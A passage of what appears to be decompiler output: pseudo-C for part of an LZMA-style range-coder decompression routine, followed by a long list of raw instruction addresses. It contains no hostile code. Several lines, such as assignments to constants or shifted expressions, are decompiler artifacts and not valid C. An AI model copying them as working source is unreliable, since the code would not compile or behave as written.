												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L79;
											case 0x1b:
												L75:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t274 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t274;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t283 = __ebp - 0x64;
												 *_t283 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t283;
												 *( *(__ebp - 0x68)) = __cl;
												L79:
												 *(__ebp - 0x14) = __edx;
												goto L80;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L80:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t544 = _t543 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}














                                                                      0x00000000
                                                                      0x00406557
                                                                      0x00406557
                                                                      0x0040655b
                                                                      0x0040657c
                                                                      0x00406583
                                                                      0x00406589
                                                                      0x0040658f
                                                                      0x004065a1
                                                                      0x004065a7
                                                                      0x004065ac
                                                                      0x00000000
                                                                      0x0040655d
                                                                      0x00406563
                                                                      0x00406924
                                                                      0x00406924
                                                                      0x00406924
                                                                      0x00406927
                                                                      0x00406927
                                                                      0x00406927
                                                                      0x0040692d
                                                                      0x00406933
                                                                      0x00406939
                                                                      0x00406953
                                                                      0x00406956
                                                                      0x0040695c
                                                                      0x00406967
                                                                      0x00406969
                                                                      0x0040693b
                                                                      0x0040693b
                                                                      0x0040694a
                                                                      0x0040694e
                                                                      0x0040694e
                                                                      0x00406973
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406975
                                                                      0x00406979
                                                                      0x00406b28
                                                                      0x00406b3e
                                                                      0x00406b46
                                                                      0x00406b4d
                                                                      0x00406b4f
                                                                      0x00406b56
                                                                      0x00406b5a
                                                                      0x00406b5a
                                                                      0x00406985
                                                                      0x0040698c
                                                                      0x00406994
                                                                      0x00406997
                                                                      0x0040699a
                                                                      0x0040699a
                                                                      0x004069a0
                                                                      0x004069a0
                                                                      0x0040613c
                                                                      0x0040613c
                                                                      0x0040613c
                                                                      0x00406145
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040614b
                                                                      0x00000000
                                                                      0x00406156
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040615f
                                                                      0x00406162
                                                                      0x00406165
                                                                      0x00406169
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040616f
                                                                      0x00406172
                                                                      0x00406174
                                                                      0x00406175
                                                                      0x00406178
                                                                      0x0040617a
                                                                      0x0040617b
                                                                      0x0040617d
                                                                      0x00406180
                                                                      0x00406185
                                                                      0x0040618a
                                                                      0x00406193
                                                                      0x004061a6
                                                                      0x004061a9
                                                                      0x004061b5
                                                                      0x004061dd
                                                                      0x004061df
                                                                      0x004061ed
                                                                      0x004061ed
                                                                      0x004061f1
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004061e1
                                                                      0x004061e1
                                                                      0x004061e4
                                                                      0x004061e5
                                                                      0x004061e5
                                                                      0x00000000
                                                                      0x004061e1
                                                                      0x004061bb
                                                                      0x004061c0
                                                                      0x004061c0
                                                                      0x004061c9
                                                                      0x004061d1
                                                                      0x004061d4
                                                                      0x00000000
                                                                      0x004061da
                                                                      0x004061da
                                                                      0x00000000
                                                                      0x004061da
                                                                      0x00000000
                                                                      0x004061f7
                                                                      0x004061f7
                                                                      0x004061fb
                                                                      0x00406aa7
                                                                      0x00000000
                                                                      0x00406aa7
                                                                      0x00406204
                                                                      0x00406214
                                                                      0x00406217
                                                                      0x0040621a
                                                                      0x0040621a
                                                                      0x0040621a
                                                                      0x0040621d
                                                                      0x00406221
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406223
                                                                      0x00406229
                                                                      0x00406253
                                                                      0x00406259
                                                                      0x00406260
                                                                      0x00000000
                                                                      0x00406260
                                                                      0x0040622f
                                                                      0x00406232
                                                                      0x00406237
                                                                      0x00406237
                                                                      0x00406242
                                                                      0x0040624a
                                                                      0x0040624d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406292
                                                                      0x00406298
                                                                      0x0040629b
                                                                      0x004062a8
                                                                      0x004062b0
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406267
                                                                      0x00406267
                                                                      0x0040626b
                                                                      0x00406ab6
                                                                      0x00000000
                                                                      0x00406ab6
                                                                      0x00406277
                                                                      0x00406282
                                                                      0x00406282
                                                                      0x00406282
                                                                      0x00406285
                                                                      0x00406288
                                                                      0x0040628b
                                                                      0x00406290
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406927
                                                                      0x00406927
                                                                      0x0040692d
                                                                      0x00406933
                                                                      0x00406939
                                                                      0x00406953
                                                                      0x00406956
                                                                      0x0040695c
                                                                      0x00406967
                                                                      0x00406969
                                                                      0x0040693b
                                                                      0x0040693b
                                                                      0x0040694a
                                                                      0x0040694e
                                                                      0x0040694e
                                                                      0x00406973
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004062b8
                                                                      0x004062ba
                                                                      0x004062bd
                                                                      0x0040632e
                                                                      0x00406331
                                                                      0x00406334
                                                                      0x0040633b
                                                                      0x00406345
                                                                      0x00406924
                                                                      0x00406924
                                                                      0x00000000
                                                                      0x00406924
                                                                      0x004062bf
                                                                      0x004062c3
                                                                      0x004062c6
                                                                      0x004062c8
                                                                      0x004062cb
                                                                      0x004062ce
                                                                      0x004062d0
                                                                      0x004062d3
                                                                      0x004062d5
                                                                      0x004062da
                                                                      0x004062dd
                                                                      0x004062e0
                                                                      0x004062e4
                                                                      0x004062eb
                                                                      0x004062ee
                                                                      0x004062f5
                                                                      0x004062f9
                                                                      0x00406301
                                                                      0x00406301
                                                                      0x00406301
                                                                      0x004062fb
                                                                      0x004062fb
                                                                      0x004062fb
                                                                      0x004062f0
                                                                      0x004062f0
                                                                      0x004062f0
                                                                      0x00406305
                                                                      0x00406308
                                                                      0x00406326
                                                                      0x00406328
                                                                      0x00000000
                                                                      0x0040630a
                                                                      0x0040630a
                                                                      0x0040630d
                                                                      0x00406310
                                                                      0x00406313
                                                                      0x00406315
                                                                      0x00406315
                                                                      0x00406315
                                                                      0x00406318
                                                                      0x0040631b
                                                                      0x0040631d
                                                                      0x0040631e
                                                                      0x00406321
                                                                      0x00000000
                                                                      0x00406321
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004065c1
                                                                      0x004065c5
                                                                      0x004065e8
                                                                      0x004065eb
                                                                      0x004065ee
                                                                      0x004065f8
                                                                      0x004065c7
                                                                      0x004065c7
                                                                      0x004065ca
                                                                      0x004065cd
                                                                      0x004065d0
                                                                      0x004065dd
                                                                      0x004065e0
                                                                      0x004065e0
                                                                      0x00406924
                                                                      0x00406924
                                                                      0x00406924
                                                                      0x00000000
                                                                      0x00406924
                                                                      0x00000000
                                                                      0x00406604
                                                                      0x00406608
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040660e
                                                                      0x00406612
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406618
                                                                      0x0040661a
                                                                      0x0040661e
                                                                      0x0040661e
                                                                      0x00406621
                                                                      0x00406625
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406675
                                                                      0x00406679
                                                                      0x00406680
                                                                      0x00406683
                                                                      0x00406686
                                                                      0x00406690
                                                                      0x00406924
                                                                      0x00406924
                                                                      0x00406924
                                                                      0x00000000
                                                                      0x00406924
                                                                      0x00406924
                                                                      0x0040667b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040669c
                                                                      0x004066a0
                                                                      0x004066a7
                                                                      0x004066aa
                                                                      0x004066ad
                                                                      0x004066a2
                                                                      0x004066a2
                                                                      0x004066a2
                                                                      0x004066b0
                                                                      0x004066b3
                                                                      0x004066b6
                                                                      0x004066b6
                                                                      0x004066b9
                                                                      0x004066bc
                                                                      0x004066bf
                                                                      0x004066bf
                                                                      0x004066c2
                                                                      0x004066c9
                                                                      0x004066ce
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040675c
                                                                      0x0040675c
                                                                      0x00406760
                                                                      0x00406afe
                                                                      0x00000000
                                                                      0x00406afe
                                                                      0x00406766
                                                                      0x00406769
                                                                      0x0040676c
                                                                      0x00406770
                                                                      0x00406773
                                                                      0x00406779
                                                                      0x0040677b
                                                                      0x0040677b
                                                                      0x0040677b
                                                                      0x0040677e
                                                                      0x00406781
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406351
                                                                      0x00406351
                                                                      0x00406355
                                                                      0x00406ac2
                                                                      0x00000000
                                                                      0x00406ac2
                                                                      0x0040635b
                                                                      0x0040635e
                                                                      0x00406361
                                                                      0x00406365
                                                                      0x00406368
                                                                      0x0040636e
                                                                      0x00406370
                                                                      0x00406370
                                                                      0x00406370
                                                                      0x00406373
                                                                      0x00406376
                                                                      0x00406376
                                                                      0x00406379
                                                                      0x0040637c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406382
                                                                      0x00406388
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040638e
                                                                      0x0040638e
                                                                      0x00406392
                                                                      0x00406395
                                                                      0x00406398
                                                                      0x0040639b
                                                                      0x0040639e
                                                                      0x0040639f
                                                                      0x004063a2
                                                                      0x004063a4
                                                                      0x004063aa
                                                                      0x004063ad
                                                                      0x004063b0
                                                                      0x004063b3
                                                                      0x004063b6
                                                                      0x004063b9
                                                                      0x004063bc
                                                                      0x004063d8
                                                                      0x004063db
                                                                      0x004063de
                                                                      0x004063e1
                                                                      0x004063e8
                                                                      0x004063ec
                                                                      0x004063ee
                                                                      0x004063f2
                                                                      0x004063be
                                                                      0x004063be
                                                                      0x004063c2
                                                                      0x004063ca
                                                                      0x004063cf
                                                                      0x004063d1
                                                                      0x004063d3
                                                                      0x004063d3
                                                                      0x004063f5
                                                                      0x004063fc
                                                                      0x004063ff
                                                                      0x00000000
                                                                      0x00406405
                                                                      0x00000000
                                                                      0x00406405
                                                                      0x00000000
                                                                      0x0040640a
                                                                      0x0040640a
                                                                      0x0040640e
                                                                      0x00406ace
                                                                      0x00000000
                                                                      0x00406ace
                                                                      0x00406414
                                                                      0x00406417
                                                                      0x0040641a
                                                                      0x0040641e
                                                                      0x00406421
                                                                      0x00406427
                                                                      0x00406429
                                                                      0x00406429
                                                                      0x00406429
                                                                      0x0040642c
                                                                      0x0040642f
                                                                      0x0040642f
                                                                      0x0040642f
                                                                      0x00406435
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406437
                                                                      0x0040643a
                                                                      0x0040643d
                                                                      0x00406440
                                                                      0x00406443
                                                                      0x00406446
                                                                      0x00406449
                                                                      0x0040644c
                                                                      0x0040644f
